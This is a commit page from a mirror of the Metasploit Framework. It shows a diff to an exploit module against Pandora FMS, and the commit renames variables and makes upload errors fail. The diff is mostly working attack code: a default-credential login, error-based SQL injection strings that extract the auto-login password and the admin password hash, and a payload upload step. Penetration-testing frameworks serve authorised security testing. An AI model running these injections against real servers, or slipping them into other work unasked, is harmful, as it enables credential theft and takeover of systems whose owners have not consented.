infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fail on upload errors

bug/bundler_fix
jvazquez-r7 2014-11-25 22:48:57 -06:00
parent b24e641e97
commit 5a2d2914a9
1 changed files with 17 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

36
modules/exploits/linux/http/pandora_fms_sqli.rb
View File

@ -86,9 +86,8 @@ class Metasploit3 < Msf::Exploit::Remote
end
# Attempt to login with credentials (default admin:pandora)
def authenticate
# Attempt to login with default credentials (admin:pandora)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(uri, 'index.php'),
@ -105,17 +104,17 @@ class Metasploit3 < Msf::Exploit::Remote
return auth_succeeded?(res)
end
# Attempt to login with auto login and SQLi
def login_hash
# Generate random string and convert to hex
sqlq = rand_text_alpha(8)
sqls = sqlq.each_byte.map { |b| b.to_s(16) }.join
clue = rand_text_alpha(8)
sql_clue = clue.each_byte.map { |b| b.to_s(16) }.join
# select value from tconfig where token = 'loginhash_pwd';
sqli = "1' AND (SELECT 2243 FROM(SELECT COUNT(*),CONCAT(0x#{sqls},(SELECT MID((IFNULL(CAST"
sqli = "1' AND (SELECT 2243 FROM(SELECT COUNT(*),CONCAT(0x#{sql_clue},(SELECT MID((IFNULL(CAST"
sqli << "(value AS CHAR),0x20)),1,50) FROM tconfig WHERE token = 0x6c6f67696e686173685f707764 "
sqli << "LIMIT 0,1),0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP "
sqli << "LIMIT 0,1),0x#{sql_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP "
sqli << "BY x)a) AND 'msf'='msf"
password = inject_sql(sqli, sqlq)
password = inject_sql(sqli, clue)
if password && password.length != 0
print_status("#{peer} - Extracted auto login password (#{password})")
@ -163,15 +162,16 @@ class Metasploit3 < Msf::Exploit::Remote
def extract
# Generate random string and convert to hex
sqlq = rand_text_alpha(8)
sqls = sqlq.each_byte.map { |b| b.to_s(16) }.join
clue = rand_text_alpha(8)
hex_clue = clue.each_byte.map { |b| b.to_s(16) }.join
# select password from tusuario where id_user = 0;
sqli = "test' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x#{sqls},(SELECT MID((IFNULL"
sqli = "test' AND (SELECT 5612 FROM(SELECT COUNT(*),CONCAT(0x#{hex_clue},(SELECT MID((IFNULL"
sqli << "(CAST(password AS CHAR),0x20)),1,50) FROM tusuario WHERE id_user = 0 LIMIT 0,1)"
sqli << ",0x#{sqls},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY "
sqli << ",0x#{hex_clue},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY "
sqli << "x)a) AND 'msf'='msf"
password = inject_sql(sqli, sqlq)
password = inject_sql(sqli, clue)
if password && password.length != 0
print_good("#{peer} - Extracted admin password hash, unsalted md5 - [ #{password} ]")
@ -227,8 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote
hash = $1
else
print_error("#{peer} - Could not extract hash from response!")
print_error("#{peer} - Upload will fail!")
return false
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end
# Extract hash2
@ -236,8 +235,7 @@ class Metasploit3 < Msf::Exploit::Remote
hash2 = $1
else
print_error("#{peer} - Could not extract hash2 from response!")
print_error("#{peer} - Upload will fail!")
return false
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end
# Extract real_directory
@ -245,11 +243,11 @@ class Metasploit3 < Msf::Exploit::Remote
real_directory = $1
else
print_error("#{peer} - Could not extract real_directory from response!")
print_error("#{peer} - Upload will fail!")
return false
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end
else
print_error("#{peer} - Could not identify upload form!")
fail_with(Failure::Unknown, "#{peer} - Unable to inject payload!")
end